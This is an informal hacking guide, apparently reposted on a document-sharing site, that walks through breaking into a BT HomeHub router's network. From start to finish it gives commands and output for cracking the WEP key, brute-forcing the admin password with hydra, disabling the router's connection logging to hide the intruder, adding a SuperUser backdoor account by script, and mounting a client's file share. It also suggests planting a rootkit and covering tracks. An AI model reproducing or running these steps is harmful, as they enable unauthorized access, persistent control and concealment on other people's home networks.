Professional Documents
Culture Documents
101
DISCLAIMER 1).This guide should not be used illegally, 2)There is no warranty or responsibility associated with this guide or to the author, 3).You accept sole responsibility for your actions.
This is my first full hacking guide, so i hope you like it and it works for you in your test lab!, if you find a better way to achieve the goals in this guide then please let me no via the forum.
In order to gain access to the network we need to get the access key, and to do this we are going to use a number of tools, the quickest way to collect them all is by downloading the backtrack live CD. LIVECD : Backtrack.iso Version Latest (Final) 3 at time of writing.
Once you have downloaded the ISO burn it to CD and reboot using the CD and when you are in and at a desktop ;) continue with this guide. Are you ready?, login, Fire up X, open us a console or 3 and lets get started.
Now we have airodump-ng collecting packets on channel 6 while filtering out any other AP that maybe on the same channel by using this bssid option. This will help keep the file size lower and help my poor little D500 and DWL650 keep up. Ok so we are all set capturing the packets that are sent over this network, but its all encrypted using a KEY so we need to get this KEY if we are to go any further than just sniffing, this is achieved by sniffing for a weak packet and generating a larger number of the weak packets for the cracking process, there are a number of way to achieve this but the one we are going to use is a very simple and effective method for testing against a default BTHomeHub with at least one wireless client ;) aireplay-ng -3 -b 00:18:F6:0B:00:5D -h 00:00:00:00:00:C1 wlan0
The interface MAC (01:01:01:01:01:01) doesn't match the specified MAC (-h). ifconfig wlan0 hw ether 00:00:00:00:00:C1 Saving ARP requests in replay_arp-0712-012732.cap You should also start airodump-ng to capture replies. Read 167179 packets (got 45379 ARP requests), sent 544876 packets...(148 pps)
What should now begin to happen is that the #DATA count for your target network should start to increase quicker and quicker until you are pushing around 100+ packets per second at the AP, this in turn will cause the AP to generate the weak packet that can be collected and cracked using aircrack-ng. aircrack-ng -n 64 -z /tmp/myhomehub-01.cap
Aircrack-ng 0.9.1 [00:01:08] Tested 80/140000 keys (got 30153 IVs) KB depth byte(vote) 0 0/ 1 16( 173) 3D( 155) 94( 147) 25( 146) 03( 143) 66( 143) 55( 142) 5C( 141) 09( 138) 56( 138) F8( 138) EC( 137) 4B( 136) 1 6/ 8 88( 145) 82( 144) F4( 144) 44( 143) 0E( 142) D8( 142) 81( 139) 07( 138) 1D( 136) 73( 136) 80( 136) 87( 136) F6( 136) 2 0/ 1 D5( 165) 59( 147) 6A( 144) 98( 144) 32( 142) 89( 142) 5D( 141) 74( 140) 1B( 139) 69( 139) 80( 139) 9E( 138) 66( 137) 3 0/ 1 94( 179) 4F( 146) 10( 143) E0( 143) 0A( 142) C7( 139) F1( 139) 1E( 138) 4A( 138) 54( 137) 5F( 137) AB( 137) 02( 136) 4 0/ 10 71( 145) 8D( 143) D1( 141) 39( 140) 76( 140) C0( 140) CA( 139) 72( 138) 7C( 138) 15( 137) 03( 136) 42( 136) 47( 136) 5 0/ 1 74( 153) 37( 146) 5F( 141) 6F( 141) CE( 138) DD( 137) 90( 136) CD( 136) D3( 136) 24( 135) 45( 134) 94( 134) C6( 134) KEY FOUND! [ 10:6A:5F:51:A1 ]
To crack the key you are going to need a larger amount of weak packets while creating this guide the sniffing process took over 50 minutes and captured over 30000 weak packets. Once the process is complete you can stop [CTRL+C] airodump-ng and aireplay-ng as we have the key to authenticate to the network.
As you can see we have decrypted all the WEP data packets and can have a look inside to see what we can find within the captured data. ethereal /tmp/myhomehub-01-dec.cap Once ethereal has loaded the packets we decrypted we can start to identify useful information about the network, its hosts and services that may be available. Inside the main window there should be lists of IP address and Host names under the [Source] and [Destination] tab mine included the following: 192.168.1.253, api.home, 192.168.1.254, 192.168.1.64 This give us some idea about Hosts on the network and some IP's we can scan for services or entry points in to them. ;) this time all the information i could find is hosts, but this is always a good place to start after getting a working KEY as there might be all kinds of useful information within the collected and decrypted data, such as passwords to the AP admin interface, so its always worth having a read about using the options in ethereal as you can create filters to locate most of this information without any more interaction than is needed with the network and you will end up with some hosts to target next. We have a KEY and have checked the decrypted data we can connect to the network, this step is going to leave information about you in the logs and yes by default the HomeHub logs connections and has a page to display connected hosts.You will be on this after connecting to the network so get into gear before someone view's the page ifconfig wlan0 down iwconfig wlan0 mode managed essid BTHomeHub-9AC1 channel 6 key 10:6A:5F:51:A1 ifconfig wlan0 up dhcpcd wlan0 ifconfig wlan0 | grep inet
inet addr:192.168.1.65 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: ee86::221:1fc:f301:122/64 Scope:Link
This indicates that we are connected and have an IP address within the range identified from the packet capture and decryption.
Now we have some PORTS on the router that offer some kind of service, the first one to check should be HTTP as most router will give up some info without any password, and the HomeHub is one of them,
"with a little magic you will discover more, so much more! ;)".
mac-changer works, but you can't rely on it, find a card that lets you change the MAC in the firmware to keep the change forever
Under Wireless can you spot your host name or mac address!... You have been LOGGED! good news is that you can remove this entire! in fact you can even disable the service that will do this every time your machine makes a noise , all you need is an account on the router that has the access right needed to modify services! If we use Google to find more information about the HomeHub you will stumble across quite a lot of useful information such as there is an admin account and the hub may be vulnerable to "Double-slash Authentication Bypass", but lets just take the fact that the "admin" account is valid and try to obtain the password! We could sniff the traffic and filter the capture for HTTP base authentication but waiting for a user to authenticate maybe pointless, as most will never connect so long as something is displayed in the web browser!, but in this guide i would like to demonstrate "hydra". We have our target host, api.home, we have a user name, admin, there should be a password file included with Back|Track, if you ant got one find one or make one! cat /pentest/password/dictionaries/wordlist.txt If we start to build a list a requirements we can soon fill them, all we need is a protected URL? Well there is a nice little tool called list-urls.py and providing it with the URL http://api.home reveals a number of links within the main page such as the one used below to brute force a password for the admin account ;). ./list-urls.py http://api.home
########################################################## # # # Extract URLS from a web page # # muts@whitehat.co.il # # # ########################################################## / / javascript:GoAndRemember('/cgi/b/bb/','') javascript:GoAndRemember('/cgi/b/telephony/','') https://service.btbroadbandvoice.bt.com/selfcare/consumerYourAccount javascript:GoAndRemember('/cgi/b/telephony/', '') javascript:GoAndRemember('/cgi/b/lan/','')
So now you no the secret default password to all BT HomeHub and you can use hydra in other situations!
Follow the ".Devices" link to view the list, you will be able to click "edit" or "delete", however once you click this and your details are removed you may find your self listed again by pressing [F5] to refresh your browser! so now you have a problem and need to find the solution!.
Lets think for a minute? what are the services listed during our port scan? "telnet" was there on port "23" let take a look and see if the admin account works there! telnet api.home
Trying 192.168.1.254... Connected to api.home. Escape character is '^]'. Username : admin Password : ***** ______ BT Home Hub ___/_____/\ / /\\ 6.2.2.6 _____/__ / \\ _/ /\_____/___ \ Copyright (c) 1999-2006, THOMSON // / \ /\ \ _______//_______/ \ / _\/______ / /\ \ / // /\ __/ / \ \ / // / _\__ // / \_______\/ / / / / /\ /_/______/___________________/ /________/ /___/ \ \ \ \ ___________ \ \ \\ \ / \_\ \ / /\ \ \ \ \___\/ \ \/ / \ \\ \ / \_____/ / \ \ \________\/ /__________/ \ \ / \ _____ \ /_____\/ \ / /\ \ /___\/ /____/ \ \ / \ \ /___\/ \____\/ -----------------------------------------------------------------------_{admin}=> ?
Like most things in life there is going to be a manual! where could one be?, well the first thing to try might be Google but more closer to home you might just type "?", Following commands are available :
help menu ? exit .. saveall ping traceroute : Displays this help information : Displays menu : Displays this help information : Exits this shell. : Exits group selection. : Saves current configuration. : Send ICMP ECHO_REQUEST packets. : Send ICMP/UDP packets to trace the ip path.
Following command groups are available : firewall dyndns debug igmp mlp sntp upnp service connection dns dsd eth atm adsl config env grp hostmgr ids interface ip language memm nat ppp pptp script software system systemlog tls wireless
From this help information we can launch a menu or continue to just enter the commands via the CLI
{admin}=>menu
Can you see your details in the listing! well you might like to try and remove them using the "delete" command
{admin}=>hostmgr delete mac_addr YOU:MAC:HERE
however you will still end up being listed so what else can we do? wait a minute we can set the state of the hostmgr service! let try changing the state to disabled?
{admin}=>hostmgr config state disabled
Then remove our details using the delete command, fire up a browser and see if your listed now! try refreshing the page a few times to check.... Now you are unlisted and you have the admin password for the router, you can make changes to the network configuration and see details information about host on the network, whats the next step?, well that is up to you and as long as its your equipment your safe to do as you please. if not learn to cover your tracks. One trick might might be to gain a higher level of access!, yes the HomeHub has a SuperUser Account and you have all the tools you need to gain access to this, so get Google up and running a see what you can find?.. You might try
:script add name iwantsuperuser command ="user add name = owned password = somethingeasy role SuperUser descr =me" :script run name = iwantsuperuser pars=""
If all went well you have now created a new account with SuperUser access to the router, so login using your new SuperUser account, and have a good read of any information you can Google about the router, scripts, accounts etc... the BTHomeHub is now owned whats the next step? well you have now got access to the network and the routers administration console, you have disabled host logging, what more would you like? access to the clients on the network! there was one you hammered to gain access to the network in the first place! shall we take a look see? what about the other IP one down from the router could that be linked somehow?
So the .64 host was down?, there is no point running a scan lets move onto the next IP nmap -sV 192.168.1.253
PORT 139/tcp 515/tcp STATE open open SERVICE netbios-ssn printer VERSION Samba smbd (workgroup: BT) Xerox LPD
This looks interesting we have the same MAC address for both the .253 and .254 devices this must mean that the router has more than one interface.
MAC Address: 00:18:F6:0B:00:5C (Unknown) Service Info: Device: broadband router
Also we can see the 253 device is showing 2 services one of which is NETBIOS this is a file sharing based protocol so maybe we can connection to the remote file system? lets see what there is on the host using "smbtree" smbtree -N
BT \\THOMSON \\THOMSON\ADMIN$ \\THOMSON\IPC$ \\THOMSON\BT_7G Samba Server IPC Service (Samba Server) IPC Service (Samba Server) USB disk BT_7G
Great, lets create a mount point in our local file system mkdir /mnt/BTHUB And mount the remote share as a guest. mount -t smbfs -o guest,ip=192.168.1.253,workgroup=BT //THOMSON/BT_7G /mnt/BTHUB
ls /mnt/BTHUB/ AP-Testing-Lesson-1*
We now have a connection to the remote file system that network clients can view shall we copy a ROOTKIT onto the device just to see what we catch? or shall we just break into the last missing client, I am sure you have read enough to gain access to the last client your self, it not read this guide again because I no that you have ;)
Well here ends my guide, I hope you enjoyed the read and have gained something from it, please feel free to update and distribute were ever you see fit!